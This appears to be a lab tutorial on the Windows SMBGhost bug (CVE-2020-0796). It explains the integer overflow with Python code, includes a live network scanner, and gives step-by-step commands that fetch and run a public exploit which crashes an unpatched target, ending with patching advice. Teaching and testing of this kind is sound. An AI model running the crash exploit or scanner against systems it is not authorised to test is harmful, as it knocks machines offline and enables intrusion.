How to Manually Exploit the Windows 10 SMBGhost Vulnerability
What is the SMBGhost Vulnerability?
The SMBGhost vulnerability (CVE-2020-0796) is an integer overflow in the SMBv3 compression handling of srv2.sys, the kernel-mode SMB server driver on Windows 10 and Windows Server, that leads to a buffer overflow. It is a "wormable" remote code execution (RCE) flaw and has also been nicknamed EternalDarkness and CoronaBlue. It is not the same bug as EternalBlue, which is the 2017 SMBv1 vulnerability (MS17-010) abused by WannaCry. SMB, the Microsoft Server Message Block protocol, is what lets devices share resources such as printers and files across a network.
SMB 3.1.1 added optional message compression. The vulnerable code reads two sizes from the attacker-supplied compression transform header, OriginalCompressedSegmentSize and Offset, adds them as 32-bit values without checking for overflow, and allocates a buffer of the wrapped result. The decompressor is then told the output buffer holds the full OriginalCompressedSegmentSize bytes, so attacker-controlled data is written past the end of the undersized allocation. Because this happens in the kernel (on the server, and also on a client that connects to a malicious server), a successful exploit gives code execution at kernel level, and a failed attempt crashes the machine.
The vulnerability is considered wormable because no authentication is required: any host that can reach TCP port 445 can send the compressed message. Malware could exploit the flaw, then use the compromised system to scan for and attack other vulnerable machines on the network.
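The arithmetic behind the overflow, as an added example written for this page and modelled on public analyses of the bug; it is not code from srv2.sys or from either GitHub repository. Field names and layout follow the SMB2 COMPRESSION_TRANSFORM_HEADER in MS-SMB2 section 2.2.42; the function names, the check against the received length and the constructed header values are this example's own assumptions. It shows the pre-patch size computation beside an overflow-checked one:

```python
import struct

COMPRESSION_MAGIC = 0xFC534D42            # ProtocolId bytes FC 'S' 'M' 'B'
HEADER_FMT = "<IIHHI"                     # ProtocolId, OriginalCompressedSegmentSize,
                                          # CompressionAlgorithm, Flags, Offset
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 16 bytes
U32_MAX = 0xFFFFFFFF
LZNT1 = 0x0001


def parse_transform_header(msg):
    """Split an SMB2 COMPRESSION_TRANSFORM_HEADER from the data that follows it."""
    if len(msg) < HEADER_LEN:
        raise ValueError("message shorter than the transform header")
    proto, orig_size, algo, flags, offset = struct.unpack_from(HEADER_FMT, msg)
    if proto != COMPRESSION_MAGIC:
        raise ValueError("not a compressed SMB2 message")
    return {"orig_size": orig_size, "algorithm": algo, "flags": flags,
            "offset": offset, "payload_len": len(msg) - HEADER_LEN}


def vulnerable_alloc_size(hdr):
    # Pre-patch behaviour: OriginalCompressedSegmentSize + Offset as an unchecked 32-bit add.
    # A value near 0xFFFFFFFF plus a small Offset wraps to a tiny allocation, while the
    # decompressor is still told the output buffer holds orig_size bytes.
    return (hdr["orig_size"] + hdr["offset"]) & U32_MAX


def checked_alloc_size(hdr):
    # Hardened version: refuse the message if the add would overflow 32 bits (the fix used an
    # overflow-checked add) or if Offset points beyond the data actually received
    # (the second check is an extra sanity check assumed by this example).
    total = hdr["orig_size"] + hdr["offset"]
    if total > U32_MAX:
        raise ValueError("OriginalCompressedSegmentSize + Offset overflows 32 bits")
    if hdr["offset"] > hdr["payload_len"]:
        raise ValueError("Offset exceeds received data")
    return total


def is_rejected(hdr):
    """True when the hardened check refuses the header."""
    try:
        checked_alloc_size(hdr)
    except ValueError:
        return True
    return False


def build_transform_header(orig_size, offset, payload, algorithm=LZNT1):
    """Constructed test input for this example, not a capture from a real client."""
    return struct.pack(HEADER_FMT, COMPRESSION_MAGIC, orig_size, algorithm, 0, offset) + payload


if __name__ == "__main__":
    benign = parse_transform_header(build_transform_header(0x100, 0, b"\x00" * 32))
    hostile = parse_transform_header(build_transform_header(0xFFFFFFFF, 0x10, b"\x00" * 32))
    for name, hdr in (("benign", benign), ("hostile", hostile)):
        print(name, "alloc (vulnerable) =", hex(vulnerable_alloc_size(hdr)),
              "rejected by check =", is_rejected(hdr))
```

The hostile header asks for a 0xFFFFFFFF-byte uncompressed segment at offset 0x10; the unchecked add wraps to 0xF, so the pre-patch code would allocate 15 bytes and then let the decompressor write far beyond them, which is exactly the pool corruption the crash in the second half of this page relies on. The checked version refuses the same header before any allocation happens.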
Vulnerable systems (unpatched, i.e. without the March 12, 2020 update KB4551762) include:
- Windows 10, versions 1903 and 1909
- Windows Server, versions 1903 and 1909 (Server Core installations)
Scanning a Windows 10 Machine for the Vulnerability
Running an nmap scan against the target Windows 10 machine shows that TCP port 445 (SMB over TCP) is open, which this exploit requires:

Next, we want a tool that reports whether a target is susceptible without crashing or exploiting it. For this lab, I used ButrintKomoni's CVE-2020-0796 Python scanner (the repository cloned below).
In a terminal, clone the repository with:
git clone https://github.com/ButrintKomoni/cve-2020-0796

The scanner is a Python 3 script at the root of the cloned repository; run it against the target with:
python3 cve-2020-0796-scanner.py <ip address>
Running the program reports the Windows 10 system as vulnerable. Be clear about what that means: the scanner only reads the server's NEGOTIATE response (SMB 3.1.1 with a compression capability advertised) and never sends a malformed compressed message, so a positive result says the host exposes the vulnerable feature, not that it is definitely unpatched. Confirm the patch level (KB4551762) before treating it as exploitable:
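What such a scanner sends and checks, as an added example written for this page (it is not ButrintKomoni's scanner or any other repository's code): an SMB2 NEGOTIATE request offering only dialect 3.1.1 together with a compression negotiate context, and a parser that pulls DialectRevision and any SMB2_COMPRESSION_CAPABILITIES context out of the response. Message layouts follow MS-SMB2; the all-zero preauth salt, the fixed credit and capability values, the function names, and the fake response produced by build_sample_response for offline testing are this example's own assumptions. scan() performs the live check against TCP 445.

```python
import socket
import struct
import sys
import uuid

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
DIALECT_311 = 0x0311
CTX_PREAUTH_INTEGRITY = 0x0001
CTX_COMPRESSION = 0x0003
COMP_NONE, COMP_LZNT1 = 0x0000, 0x0001


def pad8(b):
    return b + b"\x00" * ((8 - len(b) % 8) % 8)


def smb2_header(command, message_id=0):
    # 64-byte SMB2 header; status, flags and signature are zero for an initial request
    return SMB2_MAGIC + struct.pack("<HHIHHIIQIIQ16s", 64, 0, 0, command, 1, 0, 0,
                                    message_id, 0, 0, 0, b"\x00" * 16)


def negotiate_context(ctx_type, data):
    # SMB2_NEGOTIATE_CONTEXT: ContextType, DataLength, Reserved, Data (caller pads between contexts)
    return struct.pack("<HHI", ctx_type, len(data), 0) + data


def build_negotiate_request(client_guid=None):
    """NetBIOS-framed SMB2 NEGOTIATE offering dialect 3.1.1 plus a compression context."""
    guid = (client_guid or uuid.uuid4()).bytes_le
    dialects = struct.pack("<H", DIALECT_311)
    fixed = 36 + len(dialects)                 # fixed request fields plus the dialect array
    pad = (8 - fixed % 8) % 8
    ctx_offset = 64 + fixed + pad              # contexts are 8-aligned, measured from the header start
    preauth = struct.pack("<HHH", 1, 32, 0x0001) + b"\x00" * 32     # SHA-512, 32-byte (all-zero) salt
    comp = struct.pack("<HHI", 1, 0, 0) + struct.pack("<H", COMP_LZNT1)  # one algorithm: LZNT1
    contexts = (pad8(negotiate_context(CTX_PREAUTH_INTEGRITY, preauth))
                + negotiate_context(CTX_COMPRESSION, comp))
    body = struct.pack("<HHHHI16sIHH", 36, len(dialects) // 2, 0x0001, 0, 0, guid, ctx_offset, 2, 0)
    msg = smb2_header(SMB2_NEGOTIATE) + body + dialects + b"\x00" * pad + contexts
    return struct.pack(">I", len(msg)) + msg   # NetBIOS session header: type 0 + 3-byte length


def parse_negotiate_response(packet):
    """Return (dialect, [compression algorithms]) from a NetBIOS-framed NEGOTIATE response."""
    msg = packet[4:]
    if msg[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    struct_size, _sec_mode, dialect, ctx_count = struct.unpack_from("<HHHH", msg, 64)
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE response size")
    (ctx_offset,) = struct.unpack_from("<I", msg, 64 + 60)
    algos, off = [], ctx_offset
    for _ in range(ctx_count):                 # contexts are only present for dialect 3.1.1
        ctx_type, data_len = struct.unpack_from("<HH", msg, off)
        data = msg[off + 8:off + 8 + data_len]
        if ctx_type == CTX_COMPRESSION:
            (count,) = struct.unpack_from("<H", data, 0)
            algos = list(struct.unpack_from("<%dH" % count, data, 8))
        off = off + 8 + data_len
        off += (8 - off % 8) % 8
    return dialect, algos


def compression_advertised(packet):
    """The scanner's verdict: SMB 3.1.1 negotiated and at least one real compression algorithm offered."""
    dialect, algos = parse_negotiate_response(packet)
    return dialect == DIALECT_311 and any(a != COMP_NONE for a in algos)


def build_sample_response(algos):
    """Constructed NEGOTIATE response for offline testing (not a capture from a real server)."""
    contexts = b""
    if algos is not None:
        comp = struct.pack("<HHI", len(algos), 0, 0) + struct.pack("<%dH" % len(algos), *algos)
        contexts = negotiate_context(CTX_COMPRESSION, comp)
    count = 1 if contexts else 0
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, 1, DIALECT_311, count, b"\x00" * 16,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 128 if count else 0)
    msg = smb2_header(SMB2_NEGOTIATE) + body + contexts
    return struct.pack(">I", len(msg)) + msg


def scan(host, port=445, timeout=5):
    """Live check: True when the target advertises SMB 3.1.1 compression."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        head = s.recv(4)
        length = struct.unpack(">I", head)[0] & 0xFFFFFF
        data = b""
        while len(data) < length:
            chunk = s.recv(length - len(data))
            if not chunk:
                break
            data += chunk
    return compression_advertised(head + data)


if __name__ == "__main__":
    print("SMB 3.1.1 compression advertised:", scan(sys.argv[1]))
```

Run it as `python3 scanner.py <ip address>` (the file name is the example's own). The verdict is deliberately named compression_advertised rather than "vulnerable": a host that has compression disabled through the registry workaround comes back False, while a host that still advertises compression needs its patch level checked.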

Crashing the Target System
At this point, we can use another tool to either crash or exploit the target machine. The Python tool I used to crash the remote system is jiansiting's CVE-2020-0796 repository (cloned below).
In the terminal, I changed my directory to the Desktop and cloned the repository:
cd Desktop
git clone https://github.com/jiansiting/CVE-2020-0796

Then, navigate into the directory:
cd CVE-2020-0796
ls
You’ll see the Python exploit file:

Inside the script, the only value you need to change is the target IP address. Open it, set the target, and then run it:
nano cve-2020-0796.py

python3 cve-2020-0796.py <ip address>

After running the exploit, my Windows 10 machine crashed in about 15 seconds. The script needs no credentials: it negotiates SMB 3.1.1 with compression and then sends a compressed message whose OriginalCompressedSegmentSize and Offset fields make the kernel allocate an undersized buffer, so the out-of-bounds write corrupts kernel memory and the system bugchecks (blue screen):

The target machine successfully crashed!
This is a critical vulnerability: an unauthenticated attacker who can reach TCP port 445 can crash the host at will, and with more work execute code in the kernel. It highlights the importance of timely patching (here, KB4551762 from March 2020) and ongoing vulnerability scanning in any environment. Where the patch cannot be applied immediately, Microsoft's advisory ADV200005 describes disabling SMBv3 compression through the DisableCompression registry value, and inbound TCP port 445 should be blocked at the network perimeter in any case.